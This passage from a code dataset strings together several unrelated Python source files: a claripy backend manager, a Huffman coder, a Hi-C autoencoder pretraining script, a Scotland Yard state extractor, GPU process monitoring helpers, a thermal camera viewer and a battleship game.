compute_output_shape(self, input_shape):\n return input_shape[1][:-1]\n\nclass Combine(tf.keras.layers.Layer):\n\n def call(self, inputs):\n return tf.stack(inputs, axis=1)\n","sub_path":"BiDAF_tf2/layers/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195063275","text":"\"\"\"\nModule for registering and managing backends.\n\"\"\"\n\nclass BackendManager(object):\n \"\"\"\n Class to manage the various supported backends.\n \"\"\"\n\n def __init__(self):\n self._eager_backends = [ ]\n self._quick_backends = [ ]\n self._all_backends = [ ]\n self._backends_by_type = { }\n self._backends_by_name = { }\n\n def _register_backend(self, b, name, eager, quick):\n \"\"\"\n Register a new backend.\n\n :param b: Backend to register.\n :param name: Name of backend.\n :param eager: Boolean indicating if the backend is eager.\n :param quick: Boolean indicating if the backend is quick.\n \"\"\"\n self._backends_by_name[name] = b\n self._backends_by_type[b.__class__.__name__] = b\n self._all_backends.append(b)\n if eager:\n self._eager_backends.append(b)\n\n if quick:\n self._quick_backends.append(b)\n\n def __getattr__(self, a):\n if a in self._backends_by_name:\n return self._backends_by_name[a]\n else:\n raise AttributeError(a)\n\n def downsize(self):\n \"\"\"\n Calls the downsize method of all the backends currently registered.\n \"\"\"\n for b in self._all_backends:\n b.downsize()\n\nbackends = BackendManager()\n","sub_path":"claripy/backend_manager.py","file_name":"backend_manager.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52661561","text":"fact = [1]\nfor i in range (2,11):\n fact.append(i*fact[i-2])\n\nN = int(1e6)-1\nord = []\nfor i in range(10,1,-1):\n ord.append(N//fact[i-2])\n N%=fact[i-2]\n\nans = []\ndig = [0,1,2,3,4,5,6,7,8,9]\nfor d in ord:\n ans.append(dig.pop(d))\nans.append(dig.pop(0))\n\nstr=\"\"\nfor d in ans:\n str+=\"%d\"%d\nprint(str)","sub_path":"024. Lexicographic permutations.py","file_name":"024. 
Lexicographic permutations.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"583344566","text":"import game.constants as const\n\nimport numpy as np\n\n\nclass DetectiveState():\n \"\"\"\n Class to hold detectives' state\n \"\"\"\n\n def __init__(self):\n self.detectivepos = [] # position of the acting detective\n self.otherpos = [] # positions of other detectives\n self.detectivecards = [] # resources of acting detective\n self.revealcountdown = 0\n self.gamecountdown = 0\n self.possiblemrx = []\n self.defeated = False\n\n def extractDetState(self, game, idnumber):\n\n det = game.detectives[idnumber]\n self.detectivepos = det.position\n self.otherpos = [d.position for d in game.detectives if not d.id == idnumber]\n\n self.detectivecards = [det.cards['underground'] / 4, det.cards['bus'] / 8, det.cards['taxi'] / 11]\n\n # Reveal countdown\n revealcountdown = -1\n for i in const.MRX_OPEN_TURNS[:-1]:\n revealcountdown = i - len(game.misterx.history)\n if revealcountdown >= 0:\n break\n\n # Once the last reveal has passed, the counter is always set to 4\n # (= the maximum counter value) so that the detectives keep the\n # impression that the next reveal is still far away and therefore\n # keep hunting Mister X.\n # 4 is used as the maximum so that the value can be normalized.\n if revealcountdown < 0:\n revealcountdown = 4\n\n self.revealcountdown = revealcountdown / 4\n\n self.gamecountdown = (game.turns - len(game.misterx.history)) / game.turns\n\n possiblepos = game.board.possibleMisterXPositions()\n onehotvec = np.zeros(game.board.size)\n for i in possiblepos:\n onehotvec[i - 1] = 1\n self.possiblemrx = onehotvec\n self.defeated = det.defeated\n return self\n\n def display(self):\n print(f'Detective position: {self.detectivepos}\\nDetective cards: {self.detectivecards}\\nOther detectives: {self.otherpos}\\nReveal countdown: {self.revealcountdown}\\nGame countdown: {self.gamecountdown}\\nOne hot possible Mr X: {self.possiblemrx}')\n\n\nclass MrXState():\n\n def __init__(self):\n self.position = []\n self.detectivepos = []\n self.detectivecards = []\n self.revealcountdown = 0\n self.gamecountdown = 0\n self.blackcards = 0\n self.doublemoves = 0\n self.detdefeated = []\n\n def extractMrXState(self, game):\n self.position = game.misterx.position\n self.detectivepos = [det.position for det in game.detectives]\n for det in game.detectives:\n self.detectivecards.extend([det.cards['taxi'] / 11, det.cards['bus'] / 8, det.cards['underground'] / 4])\n\n # Reveal countdown\n revealcountdown = -1\n for i in const.MRX_OPEN_TURNS[:-1]:\n revealcountdown = i - len(game.misterx.history)\n if revealcountdown >= 0:\n break\n\n # Once the last reveal has passed, the counter is always set to 4\n # (= the maximum counter value) so that the detectives keep the\n # impression that the next reveal is still far away and therefore\n # keep hunting Mister X.\n # 4 is used as the maximum so that the value can be normalized.\n if revealcountdown < 0:\n revealcountdown = 4\n \n self.revealcountdown = revealcountdown / 4\n\n self.gamecountdown = (game.turns - len(game.misterx.history)) / game.turns\n self.blackcards = game.misterx.cards['black']\n self.doublemoves = game.misterx.cards['double']\n self.detdefeated = [det.defeated for det in game.detectives]\n return self\n\n def display(self):\n print(f'MrX position: {self.position}\\nDetective positions: {self.detectivepos}\\nDetective cards: 
{self.detectivecards}\\nReveal countdown: {self.revealcountdown}\\nGame countdown: {self.gamecountdown}\\nBlack cards: {self.blackcards}\\nDouble moves left: {self.doublemoves}\\nDetectives defeated: {self.detdefeated}')\n","sub_path":"detectivestate.py","file_name":"detectivestate.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"344380928","text":"# Shadow in battle mode\n\nfrom .Enum import *\nfrom .Persona import *\n\nclass Shadow:\n source = None\n player = None\n hp = 0\n sp = 0\n atk = 0\n isKnown = False\n trueName = None\n knockdown = 0\n buffs = None\n\n def __init__(self, player):\n self.player = player\n self.buffs = dict()\n\n# end turn, -1 turns and check for buffs timeout\n def turn(self):\n calc = False\n for s in self.buffs.copy():\n self.buffs[s] -= 1\n if (self.buffs[s] > 0):\n continue\n\n self.player.say(s + ' wears off.')\n del self.buffs[s]\n calc = True\n\n if (calc):\n self.recalc()\n\n\n# recalc all stats\n def recalc(self):\n oldhp = self.hp\n oldsp = self.sp\n\n # copy stats from object\n self.__dict__.update(self.source.__dict__)\n\n # fix old stats\n self.hp = oldhp\n self.sp = oldsp\n self.isKnown = (self.name in self.player.shadowsKnown)\n if (not self.isKnown):\n self.name = \"the shadow\"\n\n # apply buffs and debuffs\n for k in self.buffs.keys():\n skill = SkillList[k]\n skill.apply(self)\n\n\n# reset shadow stats\n def reset(self, o):\n # copy stats from object\n self.source = o\n self.__dict__.update(o.__dict__)\n self.trueName = self.name\n\n # fix stats\n self.knockdown = 0\n self.maxHP = self.hp\n self.maxSP = self.sp\n self.atk = ShadowAtk[self.level]\n self.buffs.clear()\n\n # analyzed or not\n self.isKnown = (self.name in self.player.shadowsKnown)\n if (not self.isKnown):\n self.name = \"the shadow\"\n\n\n######################################\n\nglobal SkillList\n\nShadowAtk = [ 0, 28, 35, 40, 47, 52, 58, 72, 86, 93, 101,\n 114, 120, 126, 133, 140, 146, 153, 160, 166, 200 ]\nShadowCache = dict()\nShadowList = dict()\n\nShadowList['Lying Hablerie'] = PersonaStats(\n name = 'Lying Hablerie',\n arcana = Arcana.Magician,\n floor = (1, 2),\n level = 5,\n hp = 73,\n sp = 51,\n exp = 24,\n yen = 180,\n skills = [],\n affinity = {\n DamageType.Ice: DamageAffinity.Weak,\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Fire: DamageAffinity.Strong,\n }\n )\n\nShadowList['Calm Pesce'] = PersonaStats(\n name = 'Calm Pesce',\n arcana = Arcana.Priestess,\n floor = (1, 2),\n level = 6,\n hp = 82,\n sp = 23,\n exp = 38,\n yen = 180,\n skills = [],\n affinity = {\n DamageType.Wind: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n DamageType.Ice: DamageAffinity.Block,\n }\n )\n\nShadowList['Trance Twins'] = PersonaStats(\n name = 'Trance Twins',\n arcana = Arcana.Hierophant,\n floor = (3, 5),\n level = 7,\n hp = 122,\n sp = 62,\n exp = 61,\n yen = 200,\n # TODO: skill = SkillList['Mabufu'],\n skills = [ SkillList['Bufu'] ],\n affinity = {\n DamageType.Phys: DamageAffinity.Strong,\n DamageType.Wind: DamageAffinity.Block,\n DamageType.Ice: DamageAffinity.Block,\n DamageType.Elec: DamageAffinity.Block,\n }\n )\n\nShadowList['Black Raven'] = PersonaStats(\n name = 'Black Raven',\n arcana = Arcana.Hermit,\n floor = (3, 7),\n level = 7,\n hp = 108,\n sp = 25,\n exp = 57,\n yen = 180,\n # TODO: skill = SkillList['Tarukaja'],\n skills = [],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Wind: DamageAffinity.Block,\n DamageType.Fire: 
DamageAffinity.Block,\n }\n )\n\nShadowList['Magic Hand'] = PersonaStats(\n name = 'Magic Hand',\n arcana = Arcana.Magician,\n floor = (3, 5),\n level = 8,\n hp = 130,\n sp = 10,\n exp = 77,\n yen = 190,\n skills = [ SkillList['Agi'] ],\n # TODO: skill2 = SkillList['Blue Wall'],\n affinity = {\n DamageType.Ice: DamageAffinity.Weak,\n }\n )\n\n# TODO: actually summoned by Positive King\nShadowList['Secret Bambino'] = PersonaStats(\n name = 'Secret Bambino',\n arcana = Arcana.Empress,\n floor = (4, 7),\n level = 10,\n hp = 122,\n sp = 62,\n exp = 61,\n yen = 200,\n skills = [ SkillList['Bash'] ],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n }\n )\n\n# TODO: special AI\n# It will summon a Secret Bambino and then try to hit party members with Zio. After some turns pass, it will Stand By and then escape the battle. If a Phantom Mage is present in battle, it may instead summon a Bronze Dice shadow.\nShadowList['Positive King'] = PersonaStats(\n name = 'Positive King',\n arcana = Arcana.Emperor,\n floor = (4, 7),\n level = 11,\n hp = 160,\n sp = 43,\n exp = 142,\n yen = 200,\n # TODO: skill = SkillList['Summon Secret Bambino'],\n skills = [],\n affinity = {\n DamageType.Fire: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n# DamageType.Elec: DamageAffinity.Reflect,\n }\n )\n\nShadowList['Bronze Dice'] = PersonaStats(\n name = 'Bronze Dice',\n arcana = Arcana.Fortune,\n floor = (4, 7),\n level = 10,\n hp = 130,\n sp = 34,\n exp = 222,\n yen = 200,\n # TODO: skill = SkillList['Last Resort'],\n skills = [],\n affinity = {\n DamageType.Elec: DamageAffinity.Weak,\n DamageType.Phys: DamageAffinity.Strong,\n }\n )\n\n\"\"\"\nShadowList[''] = PersonaStats(\n name = '',\n arcana = Arcana.,\n floor = (),\n level = ,\n hp = ,\n sp = ,\n exp = ,\n yen = ,\n skills = [],\n weak = [],\n strong = [],\n block = [],\n absorb = [],\n reflect = [],\n )\n\"\"\"\n\n# fill shadows cache by level\nfor s in ShadowList:\n shadow = ShadowList[s]\n for i in range(shadow.floor[0], shadow.floor[1] + 1):\n if (not i in ShadowCache):\n ShadowCache[i] = []\n ShadowCache[i].append(shadow)\n\n","sub_path":"igor/Shadow.py","file_name":"Shadow.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"98065108","text":"import torch\nimport os\nfrom torch.utils.data import Dataset, DataLoader\n\nimport numpy as np\nimport torch.nn.functional as nnf\nfrom sklearn.model_selection import train_test_split\n\nfrom lib.CAE import CAE_3, CAE_5, CAE_BN_5\nfrom lib.DCEC import DCEC_3, DCEC_5, DCEC_BN_5\n\n# Select which GPU to use\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# Load the data\nfilename = 'path/to/cell_matrix_scHiCluster_01.npy'\ndata = np.load(filename, allow_pickle=True)\n\n# Reshape the data into [cell_num * chrom_num, H, W] format\nchrom_matrix = []\nfor i in range(len(data)):\n for matrix in data[i].values():\n matrix_tensor = torch.Tensor(matrix)\n\n # A + A.T restores the symmetric matrix\n matrix_tensor = matrix_tensor + torch.transpose(matrix_tensor, 0, 1)\n\n # resize\n x = matrix_tensor.unsqueeze_(0).unsqueeze_(0)\n x = nnf.interpolate(x, size=(150, 150), mode='bilinear', align_corners=False) \n\n chrom_matrix.append(x)\nchrom_num = len(chrom_matrix)\nchrom_matrix = torch.cat(chrom_matrix, 0)\n\n# Load the labels\nlabels = np.load('path/to/cell_label.npy')\n\n# Train/validation split\ntrain_data, val_data = train_test_split(chrom_matrix, test_size=0.2, shuffle=True)\n\n# dataset\nclass chrom_dataset(Dataset):\n def __init__(self, data=data, label=None):\n self.data = data\n\n def 
__getitem__(self, index):\n chrom_emb = self.data[index]\n return chrom_emb, chrom_emb\n\n def __len__(self):\n return len(self.data)\n\ntrain_set = chrom_dataset(data=train_data)\nval_set = chrom_dataset(data=val_data)\n\n# dataloader\n\nbatch_size = 32\ntrain_loader = torch.utils.data.DataLoader(\n dataset=train_set,\n batch_size=batch_size,\n shuffle=True)\nval_loader = torch.utils.data.DataLoader(\n dataset=val_set,\n batch_size=batch_size,\n shuffle=False)\n\n\n# pretrain CAE\ncae = CAE_BN_5(input_shape=[150,150,1], embedding_dim=30, num_clusters=4, filters=[32, 32, 64, 64, 128])\nprint(cae)\ncae.fit(chrom_matrix, labels, train_loader, val_loader, lr=0.0003, num_epochs=5, loss_type=\"mse\")\n\n\n","sub_path":"Ramani/DCEC/run_pretrain.py","file_name":"run_pretrain.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"375172412","text":"import sys\n\nclass TreeNode:\n def __init__(self, weight, c):\n self.right = None\n self.left = None\n self.weight = weight\n self.char = c\n\ndef huffman_encoding(data):\n weights_dict = {}\n for c in data:\n if c not in weights_dict:\n weights_dict[c] = TreeNode(1, c)\n else:\n weights_dict[c].weight += 1\n\n weight_list = list(weights_dict.values())\n def get_value(node):\n return node.weight\n\n weight_list.sort(key=get_value)\n codes = {}\n for c in weights_dict.keys():\n codes[c] = \"\"\n # for node in weight_list:\n # print(node.weight)\n if len(weight_list) == 0:\n return \"\", None\n\n elif len(weight_list) == 1:\n tmp = weight_list.pop(0)\n root = TreeNode(tmp.weight, tmp.char)\n root.left = tmp\n weight_list.append(root)\n codes[weight_list[0].char] = \"0\"\n else:\n while len(weight_list) > 1:\n left = weight_list.pop(0)\n right = weight_list.pop(0)\n for c in left.char:\n codes[c] = \"0\" + codes[c]\n for c in right.char:\n codes[c] = \"1\" + codes[c]\n\n new_node = TreeNode(left.weight+right.weight, left.char+right.char)\n new_node.left = left\n new_node.right = right\n weight_list.append(new_node)\n weight_list.sort(key=get_value)\n # print(codes)\n encoded_data = \"\"\n for c in data:\n encoded_data += codes[c]\n return encoded_data, weight_list[0]\n\n\ndef huffman_decoding(data,tree):\n if data == \"\" or tree == None:\n return data\n\n root = tree\n ans = \"\"\n for i in data:\n if i == \"0\":\n root = root.left\n else:\n root = root.right\n if root.left == root.right == None:\n ans += root.char\n root = tree\n return ans\n\ndef test(s):\n print (\"The size of the data is: {}\\n\".format(sys.getsizeof(s)))\n print (\"The content of the data is: {}\\n\".format(s))\n\n encoded_data, tree = huffman_encoding(s)\n if encoded_data == \"\":\n print (\"The size of the encoded data is: {}\\n\".format(sys.getsizeof(encoded_data)))\n else:\n print (\"The size of the encoded data is: {}\\n\".format(sys.getsizeof(int(encoded_data, base=2))))\n print (\"The content of the encoded data is: {}\\n\".format(encoded_data))\n\n decoded_data = huffman_decoding(encoded_data, tree)\n\n print (\"The size of the decoded data is: {}\\n\".format(sys.getsizeof(decoded_data)))\n print (\"The content of the decoded data is: {}\\n\".format(decoded_data))\n\nif __name__ == \"__main__\":\n test(\"The bird is the word\")\n test(\"AAAAAAAAA\")\n test(\"\")\n\n# *****************output*****************\n# The size of the data is: 69\n\n# The content of the data is: The bird is the word\n\n# The size of the encoded data is: 36\n\n# The content of the encoded data is: 
0110111011111100111000001010110000100011010011110111111010101011001010\n\n# The size of the decoded data is: 69\n\n# The content of the decoded data is: The bird is the word\n\n# The size of the data is: 58\n\n# The content of the data is: AAAAAAAAA\n\n# The size of the encoded data is: 24\n\n# The content of the encoded data is: 000000000\n\n# The size of the decoded data is: 58\n\n# The content of the decoded data is: AAAAAAAAA\n\n# The size of the data is: 49\n\n# The content of the data is:\n\n# The size of the encoded data is: 49\n\n# The content of the encoded data is:\n\n# The size of the decoded data is: 49\n\n# The content of the decoded data is:\n","sub_path":"P2/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"135489253","text":"from collections import deque\n\nN, M, K = map(int, input().split())\ngym = [input() for _ in range(N)]\nx1, y1, x2, y2 = map(int, input().split()); x1 -= 1; y1 -= 1; x2 -= 1; y2 -= 1\nvisited = [[0]*M for _ in range(N)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\nQ = deque([(x1, y1)])\nans = False\n\nwhile Q:\n x, y = Q.popleft()\n if x == x2 and y == y2:\n ans = True\n break\n for mode in range(4):\n for num in range(1, K+1):\n nx = x + dx[mode]*num\n ny = y + dy[mode]*num\n if nx < 0 or nx >= N or ny < 0 or ny >= M or gym[nx][ny] == '#': break\n if not visited[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n Q.append((nx, ny))\n elif visited[nx][ny] == visited[x][y] + 1:\n continue # keep going straight for now\n else:\n break # don't continue down a longer path\n\n\nif ans:\n print(visited[x2][y2])\nelse:\n print(-1)\n","sub_path":"AHYEON/02.DFSBFS/16930_달리기(bfs).py","file_name":"16930_달리기(bfs).py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"537422489","text":"r\"\"\"\nHelper functions\n\"\"\"\nimport sys\nimport time\nfrom datetime import datetime\nfrom contextlib import contextmanager\nimport torch\nimport random\nimport subprocess\n\n@contextmanager\ndef add_prefix_to_print(prefix): \n global is_new_line\n orig_write = sys.stdout.write\n is_new_line = True\n def new_write(*args, **kwargs):\n global is_new_line\n if args[0] == \"\\n\":\n is_new_line = True\n elif is_new_line:\n orig_write(\"[\" + str(prefix) + \"]: \")\n is_new_line = False\n orig_write(*args, **kwargs)\n sys.stdout.write = new_write\n yield\n sys.stdout.write = orig_write\n\n@contextmanager\ndef timer(label):\n import time\n start = time.time()\n yield\n print(f\"[Process {label}] elapsed in {time.time()-start}\")\n \ndef get_output_shape(model, image_dim):\n return model(torch.rand(*(image_dim))).data.shape\n\ndef generate_seed():\n return random.randint(1, 100000)\n\ndef get_gpu_info():\n sp = subprocess.Popen(['nvidia-smi', '-q'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_str = sp.communicate()\n out_list = out_str[0].decode(\"utf8\").split('\\n')\n out_dict = {}\n for item in out_list:\n try:\n key, val = item.split(':')\n key, val = key.strip(), val.strip()\n if key in out_dict: # Already exists\n out_dict[key].append(val)\n else:\n out_dict[key] = [val]\n except:\n pass\n return out_dict\n\ndef get_general_info(pid):\n sp = subprocess.Popen([\"ps\", \"-up\", str(pid)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_str = sp.communicate()\n outputs = out_str[0].decode(\"utf8\").split(\"\\n\")\n labels = outputs[0].split()\n info = outputs[1].split()\n
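 # \"ps\" separates columns by whitespace, so a command containing spaces spills into extra fields\n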
 if len(info) > len(labels): # Rejoin a command that was split apart\n last_label_idx = len(labels)-1 \n info[last_label_idx] = \" \".join(info[last_label_idx:])\n info = info[:len(labels)]\n process_info = {labels[i]: info[i] for i in range(len(info))}\n return process_info\n\ndef get_all_gpu_processes_info():\n processes = {}\n out_dict = get_gpu_info()\n if \"Total\" in out_dict: \n max_gpu = int(out_dict[\"Total\"][0].split()[0])\n else:\n max_gpu = -1\n processes[\"max_gpu\"] = max_gpu\n processes[\"time_updated\"] = datetime.now().strftime(\"%m/%d/%Y-%H:%M:%S\")\n for i, process_id in enumerate(out_dict[\"Process ID\"]):\n process_info = get_general_info(process_id)\n processes[process_id] = {\n \"name\": out_dict[\"Name\"][i],\n \"user\": process_info[\"USER\"],\n \"gpu_used\": int(out_dict[\"Used GPU Memory\"][i].split()[0]),\n \"%cpu_used\": float(process_info[\"%CPU\"]),\n \"%mem_used\": float(process_info[\"%MEM\"]),\n \"command\": process_info[\"COMMAND\"]\n }\n return processes\n \n","sub_path":"dopt/utils/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"46216339","text":"import cv2\nimport time\nimport threading\n\n'''\n Open UVC device\n'''\nclass camThread(threading.Thread):\n def __init__(self, previewName, camID, camFourCC):\n threading.Thread.__init__(self)\n self.previewName = previewName\n self.camID = camID\n self.camFourCC = camFourCC\n def run(self):\n print (\"Starting \" + self.previewName)\n camPreview(self.previewName, self.camID, self.camFourCC)\n\ndef camPreview(previewName, camID, camFourCC):\n cv2.namedWindow(previewName)\n cam = cv2.VideoCapture(camID)\n if cam.isOpened(): # try to get the first frame\n\n if(camFourCC == cv2.VideoWriter.fourcc('Y','1','6',' ')):\n cam.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('Y','1','6',' '))\n cam.set(cv2.CAP_PROP_CONVERT_RGB, 0)\n else:\n cam.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\n cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n cam.set(cv2.CAP_PROP_AUTOFOCUS, 0) # turn the autofocus off\n\n print('width: {}, height: {}, fps: {}, format
: {}'.format(cam.get(3), cam.get(4), cam.get(5), cam.get(8)))\n\n rval, frame = cam.read()\n else:\n rval = False\n\n while rval:\n rval, frame = cam.read()\n if(camFourCC == cv2.VideoWriter.fourcc('Y','1','6',' ')):\n # In order to display image, should be scaled and normalize.\n #minVal = numpy.amin(gray16Frame)\n #maxVal = numpy.amax(gray16Frame)\n #cv2.normalize(gray16Frame, gray16Frame, minVal, maxVal, cv2.NORM_MINMAX) \n #cv2.normalize(gray16Frame, gray16Frame, minVal, 65535, cv2.NORM_MINMAX)\n cv2.normalize(frame, frame, 20000, 65535, cv2.NORM_MINMAX) # Best Normalized \n\n cv2.imshow(previewName, frame)\n\n key = cv2.waitKey(20)\n if key == 27: # exit on ESC\n break\n\n if cam.isOpened():\n cam.release()\n cv2.destroyWindow(previewName) \n\n# Create two threads for both visible and thermal camera\n#threadVisibleCam = camThread(\"visible camera\", 0, None)\nthreadThermalCam = camThread(\"thermal camera\", \"/dev/video2\", cv2.VideoWriter.fourcc('Y','1','6',' '))\n\n#threadVisibleCam.start()\nthreadThermalCam.start()\n\n\n","sub_path":"Samples/Linux/Python/thermocam160b.py","file_name":"thermocam160b.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"420462801","text":"Map_Battleship_Player_One = []\r\nMap_Battleship_Player_Two = []\r\n\r\n\r\nclass MapBattleship:\r\n def __init__(self, map_size):\r\n self.map_size = map_size\r\n\r\n def create_map(self):\r\n map_element = \"*\"\r\n for x in range(self.map_size):\r\n map_line = []\r\n for y in range(self.map_size):\r\n map_line += map_element\r\n Map_Battleship_Player_One.append(map_line)\r\n\r\n def create_map2(self):\r\n map_element = \"*\"\r\n for x in range(self.map_size):\r\n map_line = []\r\n for y in range(self.map_size):\r\n map_line += map_element\r\n Map_Battleship_Player_Two.append(map_line)\r\n\r\n def print_map_one(self):\r\n for x in range(self.map_size):\r\n print(Map_Battleship_Player_One[x])\r\n\r\n def print_map_two(self):\r\n for x in range(self.map_size):\r\n print(Map_Battleship_Player_Two[x])\r\n\r\n\r\nclass Ships:\r\n # Types: pb, b, s, c\r\n # Start: location on board, needs to be array, Between 0 and 9\r\n # Orientation: Up, Down, Left, Right\r\n def __init__(self, ship_type, start_one, start_two, orientation, player_map_own):\r\n self.ship_type = ship_type\r\n self.start_one = start_one\r\n self.start_two = start_two\r\n self.orientation = orientation\r\n self.player_own_map = player_map_own\r\n\r\n def get_length(self):\r\n if self.ship_type == \"P\":\r\n return 2\r\n if self.ship_type == \"B\":\r\n return 3\r\n if self.ship_type == \"S\":\r\n return 3\r\n if self.ship_type == \"D\":\r\n return 4\r\n if self.ship_type == \"C\":\r\n return 5\r\n\r\n def check_map(self):\r\n can_place = False\r\n if self.orientation == \"Up\":\r\n if self.start_one - self.get_length() < 0:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Down\":\r\n if self.start_one + self.get_length() > 9:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Left\":\r\n if self.start_two - self.get_length() < 0:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Right\":\r\n if self.start_two + self.get_length() > 9:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if can_place:\r\n return True\r\n else:\r\n return False\r\n\r\n def put_in_map(self):\r\n ship_type = str(self.ship_type)\r\n if self.check_map():\r\n for x in 
range(self.get_length()):\r\n if self.orientation == \"Up\":\r\n self.player_own_map[self.start_one - x][self.start_two] = ship_type\r\n if self.orientation == \"Down\":\r\n self.player_own_map[self.start_one + x][self.start_two] = ship_type\r\n if self.orientation == \"Left\":\r\n self.player_own_map[self.start_one][self.start_two - x] = ship_type\r\n if self.orientation == \"Right\":\r\n self.player_own_map[self.start_one][self.start_two + x] = ship_type\r\n else:\r\n print(\"Enter Again ship \" + ship_type + \" in orientation \" + self.orientation)\r\n\r\n\r\nclass PlayerInput:\r\n def __init__(self):\r\n self.x_val = 0\r\n self.y_val = 0\r\n self.other_map = []\r\n\r\n def input_values(self, x_value, y_value, other_player_map):\r\n self.x_val = x_value\r\n self.y_val = y_value\r\n self.other_map = other_player_map\r\n\r\n def check_attempt(self):\r\n if self.other_map[self.x_val][self.y_val] == \"*\" or self.other_map[self.x_val][self.y_val] == \"~\":\r\n print(\"Missed\")\r\n return False\r\n elif self.other_map[self.x_val][self.y_val] != \"*\" or self.other_map[self.x_val][self.y_val] != \"~\":\r\n print(\"Player Hit\")\r\n self.other_map[self.x_val][self.y_val] = \"~\"\r\n return True\r\n\r\n\r\npl_one = [[\"P\", 0, 0, \"Right\"],\r\n [\"P\", 8, 1, \"Right\"],\r\n [\"B\", 1, 6, \"Left\"],\r\n [\"B\", 1, 9, \"Down\"],\r\n [\"S\", 3, 4, \"Down\"],\r\n [\"D\", 0, 9, \"Left\"],\r\n [\"C\", 9, 9, \"Left\"]\r\n ]\r\n\r\npl_two = [[\"P\", 9, 9, \"Left\"],\r\n [\"P\", 9, 0, \"Up\"],\r\n [\"B\", 4, 8, \"Left\"],\r\n [\"B\", 5, 4, \"Left\"],\r\n [\"S\", 8, 7, \"Up\"],\r\n [\"D\", 8, 3, \"Right\"],\r\n [\"C\", 0, 9, \"Left\"]\r\n ]\r\n\r\n\r\nclass PlayerInit:\r\n def __init__(self):\r\n self.player_map = []\r\n\r\n def populate_map(self, player_map_own, pl_list):\r\n self.player_map = player_map_own\r\n for x in range(7):\r\n ship_name = str(x)\r\n ship_name = Ships(pl_list[x][0], pl_list[x][1], pl_list[x][2], pl_list[x][3], self.player_map)\r\n ship_name.check_map()\r\n ship_name.put_in_map()\r\n\r\n\r\ndef check_map_status():\r\n is_dead = False\r\n for x in range(10):\r\n for y in range(10):\r\n if Map_Battleship_Player_One[x][y] != \"*\" and Map_Battleship_Player_One[x][y] != \"~\":\r\n is_dead = True\r\n\r\n return is_dead\r\n\r\n\r\ndef main():\r\n map_battle = MapBattleship(10)\r\n map_battle.create_map()\r\n map_battle.create_map2()\r\n\r\n player_one_input = PlayerInput()\r\n player_two_input = PlayerInput()\r\n\r\n player_one_layout = PlayerInit()\r\n player_one_layout.populate_map(Map_Battleship_Player_One, pl_one)\r\n\r\n player_two_layout = PlayerInit()\r\n player_two_layout.populate_map(Map_Battleship_Player_Two, pl_two)\r\n\r\n print(\"Player One Map\")\r\n map_battle.print_map_one()\r\n print(\"Player Two Map\")\r\n map_battle.print_map_two()\r\n\r\n while check_map_status():\r\n print(\"Player One Turn\")\r\n one_x_val = int(input(\"Enter X Val\"))\r\n one_y_val = int(input(\"Enter Y Val\"))\r\n player_one_input.input_values(one_x_val, one_y_val, Map_Battleship_Player_Two)\r\n player_one_input.check_attempt()\r\n map_battle.print_map_one()\r\n\r\n print(\"Player Two Turn\")\r\n two_x_val = int(input(\"Enter X Val\"))\r\n two_y_val = int(input(\"Enter Y Val\"))\r\n player_two_input.input_values(two_x_val, two_y_val, Map_Battleship_Player_One)\r\n player_two_input.check_attempt()\r\n map_battle.print_map_two()\r\n\r\n print(\"Game 
